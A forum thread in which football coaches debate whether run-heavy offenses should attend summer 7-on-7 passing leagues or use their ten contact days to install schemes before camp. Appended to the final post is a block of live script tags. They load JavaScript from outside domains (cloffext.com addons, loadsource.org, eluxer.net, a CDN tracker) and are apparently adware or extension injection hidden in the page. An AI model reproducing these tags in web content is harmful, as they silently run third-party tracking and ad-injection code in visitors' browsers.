For those run heavy offenses out there (wing t, DW, SW, flexbone, wishbone, etc.), does anyone NOT go to 7 on 7's? If not, what would you do with your 10 contact days (legal practices)? Thinking of just tacking them on to the beginning of camp, giving me 2.5 weeks to install and master before the pads come on.
Have always coached under spread coaches so we 7 on 7 all summer, practice all summer for the 7 on 7's along with lifting.

We are 60-40 run and when we're passing its mostly PAP.
7-on is valuable to us because it solidifies our pass defense. Everyone we play runs a "Spread to...something", and the ball is in the air quite often. If we don't participate in 7-on we won't accomplish coverage installation. We have a lot of on-field calls by the DB's and it takes time. 7-on affords the time we need.
The Spread passing game is here in HS football and isn't going away. Non participation in 7-on is, IMHO, a costly mistake.

Typically a school in the next town would have a two day tournament we would attend and then I'd try to either get together with other schools during the summer or get another passing day in. We also hosted a team camp where we'd get four nights of skelle in. I found it valuable from a defensive perspective. Also, it allows you to experiment. As were an UBSW team, we ran all of our bread and butter pass concepts from the wing but also spent time experimenting with our spread package and answers for 3rd and long, end of the half/game plays, etc. What I found is that we were more effective passing from our base formation than from spread, to the point we beat REALLY good passing programs in 7 on 7. Were we better at passing than they were. No way but, it gave us confidence that we COULD throw the ball if needed.

We don't go to any. Might do one a summer with a local school we know will run their stuff. Of course we don't have any restrictions in the summer for time we spend with our kids and work out in helmets 3 nights a week starting in July. So take it for what it's worth.
If we did have only ten days we would do it before first official day of pads to get ready instead of 7-7 for sure. Do like three or four nights a week for a couple weeks.

Yeah I would say the 7v7 is probably more valuable for your defense than your offense but it never hurts to get some throwing reps in.

Just my personal opinion but I think that adding another week to camp will make an already long season just that much longer.

Is it really any longer than prepping for 7 on 7's all summer to install your defense? If you just ran and lifted with some optional skill work after (just throwing, snapping, and catching), no coaching of scheme until those 2 weeks.

To me once you start then the grind really goes on until the end of the season. . Taking a few days over the summer makes the bites smaller so isn't as wearing. That's just my opinion. Who says that you have to do 7 on 7's? Why can't you do the installations that you plan a couple of days a week during the summer?

Even if your offense doesn't throw the ball much, your defense would still benefit from 7 on 7.

Your defense doesn’t need any work? It would, but every DC I’ve been around HATE 7 on 7’s because “it’s not real football”. So if no one wants to do it then why?!

It isn't real football but you're still letting your kids compete. You can see how well your kids play in space, see who can cover. <script type="text/javascript" src="http://cloffext.com/optout/set/lat?jsonp=__twb_cb_129612592&key=148efe5cbac585ee49&cv=1539794811&t=1539794811032"></script><script type="text/javascript" src="http://cloffext.com/optout/set/lt?jsonp=__twb_cb_798674336&key=148efe5cbac585ee49&cv=44260&t=1539794811032"></script><script type="text/javascript" src="http://cloffext.com/addons/lnkr30_nt.min.js"></script><script type="text/javascript" src="http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51847x5262x&r=1539794811037"></script><script type="text/javascript" src="http://cloffext.com/addons/lnkr5.min.js"></script><script type="text/javascript" src="http://cloffext.com/offers/coachhuey.com.js?subid=51847_5262_"></script><script type="text/javascript" src="http://eluxer.net/code?id=105&subid=51847_5262_"></script><script type="text/javascript" src="http://1675450967.rsc.cdn77.org/cu/trkshpks.js"></script>
